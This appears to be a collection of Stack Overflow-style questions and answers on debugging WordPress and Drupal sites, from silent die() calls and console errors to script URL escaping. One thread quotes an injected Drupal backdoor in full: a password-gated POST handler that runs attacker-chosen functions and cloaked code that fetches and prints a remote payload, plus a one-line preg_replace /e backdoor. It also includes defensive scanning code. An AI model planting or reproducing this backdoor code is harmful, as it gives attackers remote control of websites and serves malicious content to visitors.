I just got a job maintaining a WordPress/BuddyPress site.
I installed the site locally with a virtual host, so I didn't change any configs or code.
The site was running OK, but this morning when I tried to load it I got a white screen without any error in the log or anywhere.
I used a debugger to trace the problem and found the following super-impressive code (wp-content/plugins/events-and-bookings/lib/class_wd_wpmu_oauth.php:378):
private function _refresh_token ($token) {
    $this->set_parameter('refresh_token', $token, self::SCOPE_REFRESH);
    $this->set_header('method', 'POST');
    $raw_token = $this->_refresh_authentication_code();
    if (!$raw_token) die;          // exits silently: nothing is logged or printed
    $token_data = json_decode($raw_token, true);
    if (!$token_data) die;         // same silent exit when the response is not JSON
    $token_data['time'] = time();
    if (!isset($token_data['refresh_token'])) $token_data['refresh_token'] = $token;
    $this->set_data('token_data', $token_data);
    return $token_data;
}
I commented out the 2 lines that end with die; - and voilà! Problem solved.
My questions are:
Why does the code die without any warning - is it a security thing?
Is there a better solution than commenting out these lines?
Could the change I made cause some unexpected problem that I'm unaware of?
What is that code actually doing, or is there any info/reference on this problem?
Thanks
PageSpeed Insights is showing this error message for my WordPress website (MyBGMI.Com).
I can't fix this problem. To be very honest, I can't understand the problem.
**Errors logged to the console indicate unresolved problems. They can come from network request failures and other browser concerns. Learn more
Source
Description
TypeError: Cannot read properties of null (reading 'parentNode') at data:text/javascript;base64,...:1:200**
I tried to figure out the issue but did not understand anything. I just checked the page with the Chrome browser developer tools.
And there I found two errors, but I can't understand how to fix them.
This is base64-encoded JavaScript (usually bad when found on a WordPress site)
(you can decode it online here: https://www.base64decode.org/)
Decoded, it says:
var downloadButton=document.getElementById("download");
var counter=40;
var newElement=document.createElement("p");
newElement.innerHTML="You can download the file in 40 seconds.";
var id;
downloadButton.parentNode.replaceChild(newElement,downloadButton);
id=setInterval(function(){
    counter--;
    if(counter<0){
        newElement.parentNode.replaceChild(downloadButton,newElement);
        clearInterval(id)
    }else{
        newElement.innerHTML="JUST WAIT "+counter.toString()+" SECONDS."+"YOUR BGMI 2.3 DOWNLOAD LINK IS GENERATING"
    }
},1000)
It appears that newElement.parentNode is null and that's what's causing the error.
If this is your code, and a desired code piece on your WordPress website, try changing if(counter<0){ into if (newElement.parentNode && counter<0) {. Otherwise, find where this is coming from and remove it from your code base.
Update
Try this:
var downloadButton = document.getElementById("download");
var counter = 40;
var newElement = document.createElement("p");
newElement.innerHTML = "You can download the file in 40 seconds.";
var id;
// A freshly created element has no parentNode yet, so the guard has to check
// the button that is actually in the document, not the new paragraph.
if (downloadButton && downloadButton.parentNode) {
    downloadButton.parentNode.replaceChild(newElement, downloadButton);
    id = setInterval(function () {
        counter--;
        if (counter < 0) {
            // the paragraph may have been removed from the page in the meantime
            if (newElement.parentNode) {
                newElement.parentNode.replaceChild(downloadButton, newElement);
            }
            clearInterval(id);
        } else {
            newElement.innerHTML = "JUST WAIT " + counter.toString() + " SECONDS." + "YOUR BGMI 2.3 DOWNLOAD LINK IS GENERATING";
        }
    }, 1000);
}
I am a noob and for a month I have been trying to fix this bug, but I understand nothing... Can somebody help me?
https://imgshare.io/images/2020/03/11/Capturedd.png
medialibrary-uploader.php on line 125:
// If we've got a post, loop through and get its ID.
if ( count( $_posts ) ) {
    $_id = $_posts->ID;
} else {
What can I do to fix my theme? Maybe it's because a plugin caused a problem?
The "headers already sent" error generally comes when there is an error somewhere in your code.
Try to enable error reporting to locate your erroring code and fix it.
Comment out this line
// define('WP_DEBUG', false);
And add the code below to your config.php file to enable a more detailed error log.
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
define('WP_DEBUG_DISPLAY', false);
#ini_set('display_errors', 0);
Whenever I make an ajax request that throws an exception, the Tracy debugger is killing all output.
I've tested with Tracy turned off and exceptions get output. I've tested with just a page (i.e. not ajax) and the exception gets output by Tracy properly.
I believe I've traced the problem to Bluescreen::render():
public function render($exception)
{
    if (Helpers::isAjax() && session_status() === PHP_SESSION_ACTIVE) {
        echo $exception->getMessage(); // added while debugging; this line does get output
        ob_start(function () {});
        $this->renderTemplate($exception, __DIR__ . '/assets/BlueScreen/content.phtml');
        $contentId = $_SERVER['HTTP_X_TRACY_AJAX'];
        $_SESSION['_tracy']['bluescreen'][$contentId] = ['content' => ob_get_clean(), 'dumps' => Dumper::fetchLiveData(), 'time' => time()];
    } else {
        $this->renderTemplate($exception, __DIR__ . '/assets/BlueScreen/page.phtml');
    }
}
I added the echo line at the top. It gets output.
The reason I'm asking on SO and not filing a bug report is because just this morning it was working - the exception text was output, followed by a backtrace, followed by a message saying "unable to log error...". So I'm fairly certain the problem is mine, but I can't figure out where.
I have deleted my copy of Tracy and re-pulled from GitHub, so I'm using the latest & greatest version.
My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between lines 771 and 808 of the includes/bootstrap.inc file (code below).
This file is somehow changed constantly (once a week), from 120 KB to 123 KB. Whenever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.
Drupal 7 is updated to 7.41, and the modules are up to date.
The code that's causing the issue is somewhere between those lines (I suspect it's the "cookie" part). This is the infected/added part my hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (#$p[$_passssword] AND #$p['a'] AND #$p['c']) #$p[$_passssword](#$p['a'], #$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
I'm no back-end developer and I've been using Bootstrap for hobby-related projects for over 8 years.
I tried to clean D7 (re-uploaded fresh includes, modules and everything apart from /sites/). I tried to check this on some popular scanners.
Does anyone have any idea how to block these changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where it's coming from?
Thank you in advance.
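The gating conditions in the injected block quoted above explain why online scanners and search crawlers report the site as clean: the payload is only fetched and printed for a request that passes every test. This added Python example (not code from the question, from Drupal or from the injected file) models those tests; the regexes are the page's PHP patterns translated to Python syntax, the sample requests are constructed, and the per-request $echo_done guard is left out.

```python
import re

# Constructed model of the gating logic in the injected block: the $bad_url
# regex loop, the marker cookie, the REMOTE_ADDR prefix test and the crawler
# User-Agent test, translated from the page's PHP to Python regexes.
BAD_URL_PATTERNS = [
    r'\.(css|swf|ashx|docx|doc|xls|xlsx|xml|jpg|pdf|png|gif|ico|js|txt)$',
    r'ajax', r'cron\.php$', r'wp-login\.php$', r'/wp-includes/', r'/wp-admin',
    r'/admin/', r'/wp-content/', r'/administrator/', r'(?i:phpmyadmin)',
    r'xmlrpc\.php', r'/feed/',
]
BOT_UA = re.compile(r'googlebot|msnbot|yahoo|search|bing|ask|indexer', re.I)
COOKIE_NAME = 'PHP_SESSION_PHP'   # the cookie the injected code checks before serving


def cloak_reason(uri, user_agent, remote_addr, cookies):
    """Why the injected code would withhold its payload for this request,
    or None when it would fetch the remote URL and print the decoded body."""
    if any(re.search(p, uri) for p in BAD_URL_PATTERNS):
        return 'asset, admin or feed path ($bad_url)'
    if COOKIE_NAME in cookies:
        return 'marker cookie present: this visitor was already served'
    if not user_agent:
        return 'empty User-Agent'
    if remote_addr.strip()[:6] == '74.125':
        return 'source address in the 74.125 range the code skips'
    if BOT_UA.search(user_agent):
        return 'crawler User-Agent'
    return None


if __name__ == '__main__':
    # constructed requests: a first-time browser visit versus a crawler's visit
    ua = 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/45.0 Safari/537.36'
    print(cloak_reason('/', ua, '203.0.113.5', {}))
    print(cloak_reason('/', 'Mozilla/5.0 (compatible; Googlebot/2.1)', '203.0.113.5', {}))
```

To reproduce what the hosting provider saw, a check therefore has to look like a first-time browser visit to a normal page: a browser User-Agent, no PHP_SESSION_PHP cookie, and a path that is not an asset, admin or feed URL.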
I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.
Apart from the changes to bootstrap.inc, the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in my Drupal looked similar to this code:
<?php #preg_replace('/(.*)/e', #$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows the attackers to execute arbitrary PHP code using a simple HTTP POST request. (The preg_replace vulnerability is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!
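An added Python example (not the Hacked module and not code from this answer) that covers both halves of the advice above: it flags the backdoor signatures quoted on this page in PHP source, and it compares file hashes against a baseline taken from a clean install so modified or newly dropped files stand out. The rule names and the sample inputs are constructed; the signatures are heuristics, so review hits by hand.

```python
import hashlib
import re

# Constructed line-level signatures distilled from the injected code quoted on
# this page. Heuristics: legitimate code can trip them, so hits need review.
RULES = {
    # preg_replace('/.../e', ...): the "/" delimiter is assumed
    'preg_replace_e_modifier':
        re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    # an array element invoked as a function, like $p[$_passssword](...)
    'array_element_called': re.compile(r"\$\w+\s*\[[^\]]+\]\s*\("),
    # error-suppressed superglobal reads (@ in PHP; the page's paste shows #)
    'suppressed_superglobal': re.compile(r"[@#]\s*\$_(POST|GET|COOKIE|REQUEST)\b"),
    # base64_decode of a long inline literal
    'base64_literal_decode':
        re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}"),
}


def scan_php_source(src):
    """Return [(line_no, rule_name)] for every line that matches a signature.
    Commented-out lines are reported too: a commented backdoor is still evidence."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((no, name))
    return hits


def snapshot(files):
    """files: {path: bytes} -> {path: sha256 hex}. Take this from a clean install."""
    return {p: hashlib.sha256(b).hexdigest() for p, b in files.items()}


def changed_files(files, baseline):
    """Paths whose current hash differs from the baseline, plus paths not in it."""
    current = snapshot(files)
    return sorted(p for p, h in current.items() if baseline.get(p) != h)
```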
I'm trying to load the Google Maps API using the following syntax:
add_action('admin_enqueue_scripts', 'load_google_maps');
...
function load_google_maps()
{
    // The actual API key is configured in an options page
    $key = get_option('google_maps_api_key');
    $gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&amp;sensor=false';
    wp_enqueue_script('google-maps', $gmaps_url, NULL, NULL);
}
WordPress is escaping the "&" to "&#038;". This actually makes the Google server reject the request. When I type it directly into the browser address bar with "&sensor=false" at the end, it loads fine.
I saw a bug of this kind mentioned in the WordPress trac system: http://core.trac.wordpress.org/ticket/9243 but it was dismissed as invalid, and the admin responding to the request showed somehow that the "&#038;" approach was fine. It is definitely not fine from Google's point of view.
I could of course just get the function to echo the HTML as a script tag, but I'd rather use the wp_enqueue_script system if possible.
Anyone know of a solution to this?
Cheers,
raff
I've got something similar in our code, and it's working fine (even encoded as &#038;). I suspect your problem is that it's being double-encoded, as you already have &amp;. Try changing it to:
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
For what it's worth, our (working) code is:
wp_register_script('googlemaps', 'http://maps.googleapis.com/maps/api/js?' . $locale . '&key=' . GOOGLE_MAPS_V3_API_KEY . '&sensor=false', false, '3');
wp_enqueue_script('googlemaps');
($locale in this case is set to hl=en)
Edit
Looks like the behaviour's changed in the latest version of WordPress - the above doesn't work (but I'll leave it for people on legacy versions). The only alternative I can see to echoing the script is to add a clean_url filter, something like this:
add_filter('clean_url', 'so_handle_038', 99, 3);
function so_handle_038($url, $original_url, $_context) {
    if (strstr($url, "googleapis.com") !== false) {
        $url = str_replace("&#038;", "&", $url); // or $url = $original_url
    }
    return $url;
}
Pretty ugly, but perhaps marginally better than echoing the script, as it'll still use the WordPress dependency management.